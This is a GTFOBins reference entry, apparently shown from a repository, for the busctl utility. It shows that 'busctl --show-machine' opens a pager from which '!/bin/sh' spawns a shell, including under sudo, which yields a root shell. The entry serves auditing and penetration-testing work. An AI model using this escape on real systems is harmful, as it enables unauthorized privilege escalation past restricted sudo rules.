GTFOBins.github.io/_gtfobins/busctl.md
2020-03-17 20:19:45 +01:00

13 lines
284 B
Markdown

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
busctl --show-machine
!/bin/sh
sudo:
- code: |
sudo busctl --show-machine
!/bin/sh
---